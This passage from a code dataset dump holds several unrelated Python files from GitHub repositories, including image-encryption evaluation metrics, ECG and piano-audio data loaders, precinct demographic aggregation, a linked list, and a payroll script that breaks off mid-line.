matplotlib.pyplot as plt\r\n\r\n#计算像素数变化率\r\n\r\ndef NPCR(img1,img2):\r\n #opencv颜色通道顺序为BGR\r\n w,h,_=img1.shape\r\n\r\n #图像通道拆分\r\n B1,G1,R1=cv2.split(img1)\r\n B2,G2,R2=cv2.split(img2)\r\n\r\n #返回数组的排序后的唯一元素和每个元素重复的次数\r\n ar,num=np.unique((R1!=R2),return_counts=True)\r\n R_npcr=(num[0] if ar[0]==True else num[1])/(w*h)\r\n ar,num=np.unique((G1!=G2),return_counts=True)\r\n G_npcr=(num[0] if ar[0]==True else num[1])/(w*h)\r\n ar,num=np.unique((B1!=B2),return_counts=True)\r\n B_npcr=(num[0] if ar[0]==True else num[1])/(w*h)\r\n\r\n return R_npcr,G_npcr,B_npcr\r\n\r\n\r\n#两张图像之间的平均变化强度\r\n\r\ndef UACI(img1,img2):\r\n w,h,_=img1.shape\r\n #图像通道拆分\r\n B1,G1,R1=cv2.split(img1)\r\n B2,G2,R2=cv2.split(img2)\r\n #元素为uint8类型取值范围:0到255\r\n\r\n # print(R1.dtype)\r\n\r\n #强制转换元素类型,为了运算\r\n R1=R1.astype(np.int16)\r\n R2=R2.astype(np.int16)\r\n G1=G1.astype(np.int16)\r\n G2=G2.astype(np.int16)\r\n B1=B1.astype(np.int16)\r\n B2=B2.astype(np.int16)\r\n\r\n sumR=np.sum(abs(R1-R2))\r\n sumG=np.sum(abs(G1-G2))\r\n sumB=np.sum(abs(B1-B2))\r\n R_uaci=sumR/255/(w*h)\r\n G_uaci=sumG/255/(w*h)\r\n B_uaci=sumB/255/(w*h)\r\n\r\n return R_uaci,G_uaci,B_uaci\r\n\r\ndef RBG_correlation(channel, N):\r\n hight, width = channel.shape\r\n row = np.random.randint(0, hight-1, N)\r\n col = np.random.randint(0, width-1, N)\r\n x = []\r\n y = []\r\n #垂直相邻像素\r\n v_y = []\r\n #水平相邻像素\r\n h_y = []\r\n #对角线相邻像素\r\n d_y = []\r\n for i in range(N):\r\n x.append(channel[row[i]][col[i]])\r\n h_y.append(channel[row[i]][col[i]+1])\r\n v_y.append(channel[row[i]+1][col[i]])\r\n d_y.append(channel[row[i]+1][col[i]+1])\r\n\r\n #三个方向合在一起\r\n x = x*3\r\n y = h_y + v_y + d_y\r\n\r\n #求Ex\r\n ex = 0\r\n for i in range(N):\r\n ex = ex + channel[row[i]][col[i]]\r\n ex = ex / N\r\n\r\n #求Dx\r\n dx = 0\r\n for i in range(N):\r\n dx = dx + (channel[row[i]][col[i]]-ex)**2\r\n dx = dx / N\r\n\r\n # 求Ey\r\n h_ey = 0\r\n v_ey = 0\r\n d_ey = 0\r\n for i in range(N):\r\n h_ey = h_ey + channel[row[i]][col[i] + 1]\r\n v_ey = v_ey + channel[row[i] + 1][col[i]]\r\n d_ey = d_ey + channel[row[i] + 1][col[i] + 1]\r\n h_ey = h_ey / N\r\n v_ey = v_ey / N\r\n d_ey = d_ey / N\r\n\r\n # 求Dy\r\n h_dy = 0\r\n v_dy = 0\r\n d_dy = 0\r\n for i in range(N):\r\n h_dy = h_dy + (channel[row[i]][col[i] + 1] - h_ey) ** 2\r\n v_dy = v_dy + (channel[row[i] + 1][col[i]] - v_ey) ** 2\r\n d_dy = d_dy + (channel[row[i] + 1][col[i] + 1] - d_ey) ** 2\r\n h_dy = h_dy / N\r\n v_dy = v_dy / N\r\n d_dy = d_dy / N\r\n\r\n #求协方差\r\n h_cov = 0\r\n v_cov = 0\r\n d_cov = 0\r\n for i in range(N):\r\n h_cov = h_cov + (channel[row[i]][col[i]] - ex) * (channel[row[i]][col[i] + 1] - h_ey)\r\n v_cov = v_cov + (channel[row[i]][col[i]] - ex) * (channel[row[i] + 1][col[i]] - v_ey)\r\n d_cov = d_cov + (channel[row[i]][col[i]] - ex) * (channel[row[i] + 1][col[i] + 1] - d_ey)\r\n v_cov = v_cov / N\r\n h_cov = h_cov / N\r\n d_cov = d_cov / N\r\n h_Rxy = h_cov / (np.sqrt(dx) * np.sqrt(h_dy))\r\n v_Rxy = v_cov / (np.sqrt(dx) * np.sqrt(v_dy))\r\n d_Rxy = d_cov / (np.sqrt(dx) * np.sqrt(d_dy))\r\n return h_Rxy, v_Rxy, d_Rxy, x, y\r\n\r\ndef correlation(img, N=3000):\r\n hight, weight, _ = img.shape\r\n B, G, R = cv2.split(img)\r\n R_Rxy = RBG_correlation(R, N)\r\n B_Rxy = RBG_correlation(B, N)\r\n G_Rxy = RBG_correlation(G, N)\r\n return R_Rxy, B_Rxy, G_Rxy\r\n\r\n#对解密图像添加均值为0,方差为0.001的高斯噪声\r\ndef gauss_noise(img, mean = 0, var = 0.001):\r\n img = np.array(img / 255, dtype=float)\r\n noise = np.random.normal(mean, var ** 0.5, img.shape)\r\n out = img + noise\r\n if out.min() < 0:\r\n low_clip = -1\r\n else:\r\n low_clip = 0\r\n out = np.clip(out, low_clip, 1.0)\r\n out = np.uint8(out * 255)\r\n return out\r\n\r\n#添加默认为10%的椒盐噪声\r\ndef salt_and_pepper_noise(img, proportation = 0.1):\r\n height, width, _ = img.shape\r\n num = int(height * width * proportation)\r\n for i in range(num):\r\n w = random.randint(0, width - 1)\r\n h = random.randint(0, height - 1)\r\n if random.randint(0, 1) == 0:\r\n img[h, w] = 0\r\n else:\r\n img[h,w] = 255\r\n return img\r\n\r\n#阻塞攻击\r\ndef occlusion(img):\r\n height, width, _ = img.shape\r\n B, G, R = cv2.split(img)\r\n #随机移除R通道中80*80大小的像素块\r\n #产生随机整数\r\n R_w = random.randint(0, width - 80)\r\n R_h = random.randint(0, height - 80)\r\n for i in range(80):\r\n for j in range(80):\r\n R[R_h + i][R_w + j] = 0\r\n #随机移除G通道中50*80大小的像素块\r\n #产生随机整数\r\n G_w = random.randint(0, width - 50)\r\n G_h = random.randint(0, height - 80)\r\n for i in range(80):\r\n for j in range(50):\r\n G[G_h + i][G_w + j] = 0\r\n #随机移除B通道中80*80大小的像素块\r\n #产生随机整数\r\n #B_w = random.randint(0, width - 80)\r\n #B_h = random.randint(0, height - 80)\r\n #for i in range(80):\r\n # for j in range(80):\r\n # B[B_h + i][B_w + j] = 0\r\n out = cv2.merge([R, G, B])\r\n #随机移除全通道中60*50的像素块\r\n a_w = random.randint(0, width - 60)\r\n a_h = random.randint(0, height - 50)\r\n for i in range(50):\r\n for j in range(60):\r\n out[a_h + i][a_w + j] = np.array([0, 0, 0])\r\n return out\r\n\r\ndef evaluate(x,e):\r\n #x为原图像,e为加密后的图像\r\n # 图像相关性\r\n R1_Rxy, B1_Rxy, G1_Rxy = correlation(x)\r\n R2_Rxy, B2_Rxy, G2_Rxy = correlation(e)\r\n # 结果展示\r\n # 明文图像相邻像素的相关性接近 1,而密文图像相邻像素的相关性应该接近于 0\r\n plt.rcParams['font.sans-serif'] = ['SimHei']\r\n plt.subplot(221)\r\n plt.imshow(x[:, :, (2, 1, 0)])\r\n plt.title('原图像')\r\n plt.subplot(222)\r\n plt.scatter(R1_Rxy[3], R1_Rxy[4], s=1, c='red')\r\n plt.title('通道R')\r\n plt.subplot(223)\r\n plt.scatter(G1_Rxy[3], G1_Rxy[4], s=1, c='green')\r\n plt.title('通道G')\r\n plt.subplot(224)\r\n plt.scatter(B1_Rxy[3], B1_Rxy[4], s=1, c='blue')\r\n plt.title('通道B')\r\n plt.show()\r\n plt.rcParams['font.sans-serif'] = ['SimHei']\r\n plt.subplot(221)\r\n plt.imshow(e[:, :, (2, 1, 0)])\r\n plt.title('加密后图像')\r\n plt.subplot(222)\r\n plt.scatter(R2_Rxy[3], R2_Rxy[4], s=1, c='red')\r\n plt.title('通道R')\r\n plt.subplot(223)\r\n plt.scatter(G2_Rxy[3], G2_Rxy[4], s=1, c='green')\r\n plt.title('通道G')\r\n plt.subplot(224)\r\n plt.scatter(B2_Rxy[3], B2_Rxy[4], s=1, c='blue')\r\n plt.title('通道B')\r\n plt.show()\r\n\r\n r_npcr,g_npcr,b_npcr = NPCR(x, e)\r\n r_uaci,g_uaci,b_uaci = UACI(x, e)\r\n #它们相应的理想值分别为\r\n #NPCR = 99.6094%,UACI = 33.4635 %\r\n\r\n print('*****NPCR*****')\r\n print('RED :{:.4%}'.format(r_npcr))\r\n print('GREEN :{:.4%}'.format(g_npcr))\r\n print('BLUE :{:.4%}'.format(b_npcr))\r\n\r\n print('*****UACI*****')\r\n print('RED :{:.4%}'.format(r_uaci))\r\n print('GREEN :{:.4%}'.format(g_uaci))\r\n print('BLUE :{:.4%}'.format(b_uaci))\r\n\r\n","repo_name":"Isabel-jin/images_encryption","sub_path":"evalution.py","file_name":"evalution.py","file_ext":"py","file_size_in_byte":7321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"43452458181","text":"import wfdb as wfdb\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Draw ECG\ndef draw_ecg(x):\n plt.plot(x)\n plt.title('Raw_ECG')\n plt.show()\n \n#Draw the ECG and its R wave position\ndef draw_ecg_R(p_sTitle, p_signal,annotation,record=None):\n if record is not None:\n p_signal = record.p_signal\n plt.plot(p_signal) #Draw the ECG signal\n if annotation is not None:\n R_v=p_signal[annotation.sample] #Get R wave peak value\n for nIndex, nAnnotationSample in enumerate(annotation.sample):\n if annotation.num[nIndex] == 0:\n sColor = \"r\"\n else:\n sColor = \"b\"\n #plt.plot(annotation.sample,R_v, 'o' + sColor)#Draw R wave\n plt.plot(nAnnotationSample,R_v[nIndex],'o' + sColor)#Draw R wave\n plt.title(p_sTitle)\n plt.show()\ndef selData(record,annotation,label,R_left):\n a=annotation.symbol\n f=[k for k in range(len(a)) if a[k]==label] #Find the corresponding label R wave position index\n signal=record.p_signal\n R_pos=annotation.sample[f]\n res=[]\n for i in range(len(f)):\n if(R_pos[i]-R_left>0):\n res.append(signal[R_pos[i]-R_left:R_pos[i]-R_left+250])\n return res\n \n# Read ECG data\ndef read_ecg_data(filePath,channel_names, p_bIsReadingAnnotations=True, p_bIsVerbose=False):\n '''\n Read ECG file\n sampfrom: Set the starting position for reading the ECG signal, sampfrom=0 means to start reading from 0, and the default starts from 0\n sampto: Set the end position of reading the ECG signal, sampto = 1500 means the end from 1500, the default is to read to the end of the file\n channel_names: set the name of reading ECG signal, it must be a list, channel_names=['MLII'] means reading MLII lead\n channels: Set the number of ECG signals to be read. It must be a list. Channels=[0, 3] means to read the 0th and 3rd signals. Note that the number of signals is uncertain \n record = wfdb.rdrecord('../ecg_data/102', sampfrom=0, sampto = 1500) # read all channel signals\n record = wfdb.rdrecord('../ecg_data/203', sampfrom=0, sampto = 1500,channel_names=['MLII']) # Only read \"MLII\" signal\n record = wfdb.rdrecord('../ecg_data/101', sampfrom=0, sampto=3500, channels=[0]) # Only read the 0th signal (MLII)\n print(type(record)) # View record type\n print(dir(record)) # View methods and attributes in the class\n print(record.p_signal) # Obtain the ECG lead signal, this article obtains MLII and V1 signal data\n print(record.n_sig) # View the number of lead lines\n print(record.sig_name) # View the signal name (list), the lead name of this text ['MLII','V1']\n print(record.fs) # View the adoption rate\n '''\n \n record = wfdb.rdrecord(filePath,channel_names=[channel_names])\n if p_bIsVerbose:\n print('Number of lead lines:')\n print(record.n_sig) # View the number of lead lines\n print('Signal name (list)')\n print(record.sig_name) # View the signal name (list), the lead name of this text ['MLII','V1']\n\n '''\n Read annotation file\n sampfrom: Set the starting position for reading the ECG signal, sampfrom=0 means to start reading from 0, and the default starts from 0\n sampto: Set the end position of reading the ECG signal, sampto = 1500 means the end from 1500, the default is to read to the end of the file\n print(type(annotation)) # View the annotation type\n print(dir(annotation))# View methods and attributes in the class\n print(annotation.sample) # Mark the sharp position of the R wave of each heartbeat, corresponding to the ECG signal\n annotation.symbol #Mark the type of each heartbeat N, L, R, etc.\n print(annotation.ann_len) # The number of labels\n print(annotation.record_name) # The file name to be marked\n print(wfdb.show_ann_labels()) # View the type of heartbeat\n '''\n if p_bIsReadingAnnotations:\n annotation = wfdb.rdann(filePath,'atr')\n else:\n annotation = None\n# print(annotation.symbol)\n return record,annotation\n\nif __name__ == \"__main__\":\n from mllib.signals.multisignal import CMITMultiSignalRecording\n from mllib.visualization.multiseriegraph import CMultiSerieGraph\n oFilesAndChannels = {\"AccTempEDA\":[\"ax\",\"ay\",\"az\",\"temp\",\"EDA\"], \"SpO2HR\":[\"SpO2\", \"hr\"]}\n \n nMaxPersonNumber = 21\n \n DATASET_FOLDER = r\"G:\\MLDataSets.2022\\Physionet-Non-EEG Dataset for Assessment of Neurological Status\"\n \n oRecording = CMITMultiSignalRecording(DATASET_FOLDER, oFilesAndChannels, p_sFileFormat=\"Subject%d_%s\")\n for nPersonNumber in range(1, nMaxPersonNumber):\n oRecording.ReadRecording(nPersonNumber)\n #nSignalIndex = 6\n #draw_ecg_R(\"Subject %d channel %s\" % (nPersonNumber, oRecording.SignalNames[nSignalIndex]),oRecording.Signals[nSignalIndex],oRecording.Annotations)\n \n sTitle = \"Signals\"\n sCaptionX = \"Time\"\n sCaptionY = \"Value\"\n \n oGraph = CMultiSerieGraph()\n oGraph.Setup.LegendFontSize=10\n oGraph.Setup.Title = sTitle\n oGraph.Setup.CaptionX = sCaptionX\n oGraph.Setup.CaptionY = sCaptionY\n oGraph.Setup.CommonLineWidth = 1.5\n oGraph.Setup.DisplayFinalValue = True\n \n oSignalsToPlot = []\n oLabels = []\n for nSignalIndex in [4,5,6]:\n oSignalsToPlot.append(oRecording.Signals[nSignalIndex])\n oLabels.append(oRecording.SignalNames[nSignalIndex])\n \n oGraph.Initialize(oRecording.Time, oSignalsToPlot, oLabels, p_oPointsOfInterest=oRecording.Annotations)\n oGraph.Render(p_bIsMinMaxNormalized=True)\n oGraph.Plot()\n \n \nif False: \n import os\n IS_PLOTTING = True\n \n \n \n \n \n sCurrentChannel = \"EDA\"\n if sCurrentChannel in oFilesAndChannels[\"AccTempEDA\"]:\n sCurrentFileSuffix = \"AccTempEDA\"\n else:\n sCurrentFileSuffix = \"SpO2HR\"\n \n nMaxPersonNumber = 21\n \n DATASET_FOLDER = r\"G:\\MLDataSets.2022\\Physionet-Non-EEG Dataset for Assessment of Neurological Status\"\n \n for nPersonNumber in range(1, nMaxPersonNumber):\n SUBJECT_SIGNAL = \"Subject%d_%s\" % (nPersonNumber, sCurrentFileSuffix)\n \n sFileNameOnly = os.path.join(DATASET_FOLDER, SUBJECT_SIGNAL)\n record,annotation=read_ecg_data(sFileNameOnly, sCurrentChannel, sCurrentChannel in oFilesAndChannels[\"AccTempEDA\"])\n # draw_ecg(record.p_signal)\n print(record.sig_name)\n print(sFileNameOnly, record.p_signal.shape)\n \n \n if IS_PLOTTING:\n draw_ecg_R(\"Subject %d channel %s\" % (nPersonNumber, sCurrentChannel),record,annotation)\n if False:\n res=selData(record,annotation,'N',100)\n print(len(res))\n plt.plot(res[20])\n plt.show()","repo_name":"XarsEvandor/Machine-Learning","sub_path":"14. RNN/ReadSignalsDraft.py","file_name":"ReadSignalsDraft.py","file_ext":"py","file_size_in_byte":6519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23027834168","text":"import json\nimport os\nfrom abc import abstractmethod\n\nimport numpy as np\nimport pretty_midi\nimport soundfile\nimport torch\nfrom torch.utils.data import Dataset\nfrom tqdm import tqdm\n\nfrom constants import HOP_SIZE, MAX_MIDI, MIN_MIDI, SAMPLE_RATE\n\n\ndef allocate_batch(batch, device):\n for key in batch.keys():\n if key != 'path':\n batch[key] = batch[key].to(device)\n return batch\n\n\nclass PianoSampleDataset(Dataset):\n def __init__(self,\n path,\n groups=None,\n sample_length=16000 * 5,\n hop_size=HOP_SIZE,\n seed=42,\n random_sample=True):\n self.path = path\n self.groups = groups if groups is not None else self.available_groups()\n assert all(group in self.available_groups() for group in self.groups)\n self.sample_length = None\n if sample_length is not None:\n self.sample_length = sample_length // hop_size * hop_size\n self.random = np.random.RandomState(seed)\n self.random_sample = random_sample\n self.hop_size = hop_size\n\n self.file_list = dict()\n self.data = []\n\n print(f'Loading {len(groups)} group(s) of', self.__class__.__name__,\n 'at', path)\n for group in groups:\n self.file_list[group] = self.files(group)\n for input_files in tqdm(self.file_list[group],\n desc=f'Loading group {group}'):\n self.data.append(self.load(*input_files))\n\n def __getitem__(self, index):\n data = self.data[index]\n\n audio = data['audio']\n frames = (data['frame'] >= 1)\n onsets = (data['onset'] >= 1)\n\n frame_len = frames.shape[0]\n if self.sample_length is not None:\n n_steps = self.sample_length // self.hop_size\n\n if self.random_sample:\n step_begin = self.random.randint(frame_len - n_steps)\n step_end = step_begin + n_steps\n else:\n step_begin = 0\n step_end = n_steps\n\n begin = step_begin * self.hop_size\n end = begin + self.sample_length\n\n audio_seg = audio[begin:end]\n frame_seg = frames[step_begin:step_end]\n onset_seg = onsets[step_begin:step_end]\n\n result = dict(path=data['path'])\n result['audio'] = audio_seg.float().div_(32768.0)\n result['frame'] = frame_seg.float()\n result['onset'] = onset_seg.float()\n else:\n result = dict(path=data['path'])\n result['audio'] = audio.float().div_(32768.0)\n result['frame'] = frames.float()\n result['onset'] = onsets.float()\n return result\n\n def __len__(self):\n return len(self.data)\n\n @classmethod\n @abstractmethod\n def available_groups(cls):\n \"\"\"Returns the names of all available groups.\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def files(self, group):\n \"\"\"Returns the list of input files (audio_filename, tsv_filename) for this group.\"\"\"\n raise NotImplementedError\n\n def load(self, audio_path, midi_path):\n \"\"\"Loads an audio track and the corresponding labels.\"\"\"\n audio, sr = soundfile.read(audio_path, dtype='int16')\n assert sr == SAMPLE_RATE\n frames_per_sec = sr / self.hop_size\n\n audio = torch.ShortTensor(audio)\n audio_length = len(audio)\n\n mel_length = audio_length // self.hop_size + 1\n\n midi = pretty_midi.PrettyMIDI(midi_path)\n midi_length_sec = midi.get_end_time()\n frame_length = min(int(midi_length_sec * frames_per_sec), mel_length)\n\n audio = audio[:frame_length * self.hop_size]\n frame = midi.get_piano_roll(fs=frames_per_sec)\n onset = np.zeros_like(frame)\n for inst in midi.instruments:\n for note in inst.notes:\n onset[note.pitch, int(note.start * frames_per_sec)] = 1\n\n # to shape (time, pitch (88))\n frame = torch.from_numpy(frame[MIN_MIDI:MAX_MIDI + 1].T)\n onset = torch.from_numpy(onset[MIN_MIDI:MAX_MIDI + 1].T)\n data = dict(path=audio_path, audio=audio, frame=frame, onset=onset)\n return data\n\n\nclass MAESTRO_small(PianoSampleDataset):\n def __init__(self,\n path='data',\n groups=None,\n sequence_length=None,\n hop_size=512,\n seed=42,\n random_sample=True):\n super().__init__(path, groups if groups is not None else ['train'],\n sequence_length, hop_size, seed, random_sample)\n\n @classmethod\n def available_groups(cls):\n return ['train', 'validation', 'test', 'debug']\n\n def files(self, group):\n metadata = json.load(open(os.path.join(self.path, 'data.json')))\n\n if group == 'debug':\n files = sorted([\n (os.path.join(self.path,\n row['audio_filename'].replace('.wav', '.flac')),\n os.path.join(self.path, row['midi_filename']))\n for row in metadata if row['split'] == 'train'\n ])\n files = files[:10]\n else:\n files = sorted([\n (os.path.join(self.path,\n row['audio_filename'].replace('.wav', '.flac')),\n os.path.join(self.path, row['midi_filename']))\n for row in metadata if row['split'] == group\n ])\n files = [(audio if os.path.exists(audio) else audio.replace(\n '.flac', '.wav'), midi) for audio, midi in files]\n\n return files\n","repo_name":"juhannam/gct634-ai613-2021","sub_path":"hw3/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5691,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"29589532248","text":"import torch\nimport numpy as np\nimport torch.nn as nn\nfrom skimage import filters\nimport torch.nn.functional as F\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.initialized = False\n self.val = None\n self.avg = None\n self.sum = None\n self.count = None\n\n def initialize(self, val, weight):\n self.val = val\n self.avg = val\n self.sum = val * weight\n self.count = weight\n self.initialized = True\n\n def update(self, val, weight=1):\n if not self.initialized:\n self.initialize(val, weight)\n else:\n self.add(val, weight)\n\n def add(self, val, weight):\n self.val = val\n self.sum += val * weight\n self.count += weight\n self.avg = self.sum / self.count\n\n def value(self):\n return self.val\n\n def average(self):\n return self.avg\n\n\ndef unique(ar, return_index=False, return_inverse=False, return_counts=False):\n ar = np.asanyarray(ar).flatten()\n\n optional_indices = return_index or return_inverse\n optional_returns = optional_indices or return_counts\n\n if ar.size == 0:\n if not optional_returns:\n ret = ar\n else:\n ret = (ar,)\n if return_index:\n ret += (np.empty(0, np.bool),)\n if return_inverse:\n ret += (np.empty(0, np.bool),)\n if return_counts:\n ret += (np.empty(0, np.intp),)\n return ret\n if optional_indices:\n perm = ar.argsort(kind='mergesort' if return_index else 'quicksort')\n aux = ar[perm]\n else:\n ar.sort()\n aux = ar\n flag = np.concatenate(([True], aux[1:] != aux[:-1]))\n\n if not optional_returns:\n ret = aux[flag]\n else:\n ret = (aux[flag],)\n if return_index:\n ret += (perm[flag],)\n if return_inverse:\n iflag = np.cumsum(flag) - 1\n inv_idx = np.empty(ar.shape, dtype=np.intp)\n inv_idx[perm] = iflag\n ret += (inv_idx,)\n if return_counts:\n idx = np.concatenate(np.nonzero(flag) + ([ar.size],))\n ret += (np.diff(idx),)\n return ret\n\n\ndef colorEncode(labelmap, colors):\n labelmap = labelmap.astype('int')\n labelmap_rgb = np.zeros((labelmap.shape[0], labelmap.shape[1], 3),\n dtype=np.uint8)\n for label in unique(labelmap):\n if label < 0:\n continue\n labelmap_rgb += (labelmap == label)[:, :, np.newaxis] * \\\n np.tile(colors[label],\n (labelmap.shape[0], labelmap.shape[1], 1))\n return labelmap_rgb\n\n\ndef accuracy(batch_data, pred):\n (imgs, segs, infos) = batch_data\n _, preds = torch.max(pred.data.cpu(), dim=1)\n valid = (segs >= 0)\n acc = 1.0 * torch.sum(valid * (preds == segs)) / (torch.sum(valid) + 1e-10)\n return acc, torch.sum(valid)\n\n\ndef EPE(predicted_edge, gt_edge, sparse=False, mean=True):\n EPE_map = torch.norm(gt_edge-predicted_edge,2,1)\n if sparse:\n EPE_map = EPE_map[gt_edge != 0]\n if mean:\n return EPE_map.mean()\n else:\n return EPE_map.sum()\n\ndef getEdge(batch):\n edgeslist=[]\n for kk in range(batch.size(0)):\n x=batch[kk]\n # print(x.size()) \n x=x.cpu().data.numpy()\n if len(x.shape)>2:\n x=np.transpose(x,(1,2,0))\n x=rgb2gray(x)\n edges = filters.sobel(x)\n edgeslist.append(edges)\n edgeslist=np.array(edgeslist)\n edgeslist=torch.Tensor(edgeslist).cuda()\n edgeslist=F.Variable(edgeslist)\n return edgeslist\n\n\n\n","repo_name":"xmichelleshihx/SLSDeep","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"70864687092","text":"\nimport pandas as pd\nimport geopandas as gpd\nimport json\n\n\n# Create a dataframe mapping block IDs to precinct IDs with appropriate types.\nwith open(\"data/unitmaps/blocks20-precincts.json\") as r: correspondence = json.load(r)\ncdf = pd.DataFrame.from_dict(correspondence, orient=\"index\", columns=[\"PRECINCTID20\"])\ncdf = cdf.reset_index().rename(columns={\"index\": \"GEOID20\"})\nfor c in list(cdf): cdf[c] = cdf[c].astype(str) \n\n# Read in block-level data; get total population and VAP data.\ndemographics = pd.read_csv(\"data/demographics/blocks20-P1.csv\")\ndemographicsVAP = pd.read_csv(\"data/demographics/blocks20-P3.csv\")\ndemographicsNHVAP = pd.read_csv(\"data/demographics/blocks20-P4.csv\").drop(\"VAP20\", axis=1)\n\ndemographics = demographics.merge(demographicsVAP, on=\"GEOID20\").merge(demographicsNHVAP, on=\"GEOID20\")\ndemographics[\"GEOID20\"] = demographics[\"GEOID20\"].astype(str)\ndemographics = demographics.merge(cdf, on=\"GEOID20\")\n\n# Keep only the things we want.\nkeep = [\n \"GEOID20\", \"PRECINCTID20\", \"TOTPOP20\", \"VAP20\", \"WHITEVAP20\", \"NHWHITEVAP20\",\n \"BLACKVAP20\", \"NHBLACKVAP20\", \"AMINVAP20\", \"NHAMINVAP20\"\n]\ndemographics = demographics[keep]\n\n# Group by precinct ID, then sum. Add rows for small, overlooked precincts.\naggregated = demographics.groupby(\"PRECINCTID20\").sum().reset_index()\naggregated[\"PRECINCTID20\"] = aggregated[\"PRECINCTID20\"].str.zfill(6)\n\n# Get geometries, then assign.\nprecincts = gpd.read_file(\"data/geometries/precinct20-elec.json\")\n\n# Merge demographic data.\nprecinctsDemo = precincts.merge(aggregated, on=\"PRECINCTID20\")\nprecinctsDemo[\"PRECINCTID20\"] = precinctsDemo[\"PRECINCTID20\"].astype(str).str.zfill(6)\n\ntry:\n print(\"Checking that we don't lose precincts after adding demographics: \", end=\"\")\n assert(len(precinctsDemo) == len(precincts))\nexcept:\n print(\"missed something.\")\n print(\"aggregated precincts:\", len(aggregated))\n print(\"geometric precincts:\", len(precincts))\n print(\"missing identifiers: \", set(precincts[\"PRECINCTID20\"]).symmetric_difference(set(aggregated[\"PRECINCTID20\"])))\n\nprint(\"didn't miss anything!\")\n\n# Write to file.\nprecinctsDemo.to_file(\"data/geometries/precinct20.json\")\n","repo_name":"pizzimathy/OK","sub_path":"geometries-aggregate-demographics.py","file_name":"geometries-aggregate-demographics.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8046083694","text":"text = [\n 'A New Beginning In Your Life',\n 'Development, cooperation, and waiting',\n 'Social expansion and creative successes',\n 'Hard work and slow, but steady progress',\n 'Feeling Loose and Free',\n 'Love, Family, Home and Responsibility',\n 'a time for analysis and understanding',\n 'Attainment and capital gains',\n 'Reflection and Reaching Out'\n]\n\n\nif __name__ == '__main__':\n s = 'Hello world!'\n print(s[::-1])\n date = input(\"Birth date:\")\n while len(date) > 1:\n sum = 0\n for ch in date:\n if ch.isdigit():\n sum += int(ch)\n print(sum)\n date = str(sum)\n print(f'You number is: {date}')\n print(text[sum - 1])\n","repo_name":"iproduct/intro-python","sub_path":"fmi-2023-up-01/strings2.py","file_name":"strings2.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"71169639732","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def insert(self, value):\n new_node = Node(value)\n if self.head is None:\n self.head = new_node\n else:\n new_node.next = self.head\n self.head = new_node\n\n def includes(self, value):\n current = self.head\n while current is not None:\n if current.value == value:\n return True\n current = current.next\n return False\n\n def to_string(self):\n if self.head is None:\n return \"NULL\"\n else:\n result = \"\"\n current = self.head\n while current is not None:\n result += \"{{ {} }} -> \".format(current.value)\n current = current.next\n result += \"NULL\"\n return result\nmy_list = LinkedList()\nmy_list.insert('a')\nmy_list.insert('b')\nmy_list.insert('c')\n\nprint(\"Linked List: {}\".format(my_list.to_string()))\n\nprint(\"Includes 'b': {}\".format(my_list.includes('b')))\nprint(\"Includes 'd': {}\".format(my_list.includes('d')))","repo_name":"Sakherr/drf-api","sub_path":"data-structures-and-algorithms/linked-list/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13426363361","text":"#\n#\n#\ndef GetEmpName():\n empname = input(\"Enter employee name: \")\n return empname\n#write the GetHoursWorked function\ndef GetHoursWorked():\n hours = float(input(\"Enter total hours: \"))\n return hours\n\n\n#write the GetHourlyRate function\ndef GetHourlyRate():\n hourlyrate = float(input(\"Enter hourly rate: \"))\n return hourlyrate\n\n# write the GetTaxRate function\ndef GetTaxRate():\n taxrate = float(input(\"Enter tax rate (in %): \"))\n return taxrate\n\n\ndef CalcTaxAndNetPay(hours, hourlyrate, taxrate):\n grosspay = hours * hourlyrate\n incometax = grosspay * taxrate\n netpay = grosspay - incometax\n return grosspay, incometax, netpay\n\ndef printinfo(empname, hours, hourlyrate,grosspay, taxrate, incometax, netpay):\n print(empname, f\"{hours:,.2f}\", f\"{hourlyrate:,.2f}\", f\"{grosspay:,.2f}\", f\"{taxrate:,.1%}\", f\"{incometax:,.2f}\", f\"{netpay:,.2f}\")\n\ndef PrintTotals(TotEmployees, TotHours, TotGrossPay, TotTax, TotNetPay): \n print()\n print(f\"Total Number Of Employees: {TotEmployees}\")\n print(\"TotHours:\", hours)\n print(\"TotTax:\", incometax)\n print(\"TotGrossPay:\", grosspay)\n print(\"TotNetPay\", netpay)\n print()\n\n\nif __name__ == \"__main__\":\n TotEmployees = 0\n TotHours = 0.00\n TotGrossPay = 0.00\n TotTax = 0.00\n TotNetPay = 0.00\n\n while True:\n empname = GetEmpName()\n if (empname.upper() == \"END\"):\n break\n hours = GetHoursWorked()\n hourlyrate = GetHourlyRate()\n taxrate = GetTaxRate() \n grosspay, incometax, netpay = CalcTaxAndNetPay(hours, hourlyrate, taxrate)\n printinfo(empname, hours, hourlyrate, grosspay, taxrate, incometax, netpay)\n\n TotEmployees += 1\n TotHours += hours\n TotGrossPay += grosspay\n TotTax += taxrate\n TotNetPay += netpay\n\n\n\n\n PrintTotals (TotEmployees, TotHours, TotGrossPay, TotTax, 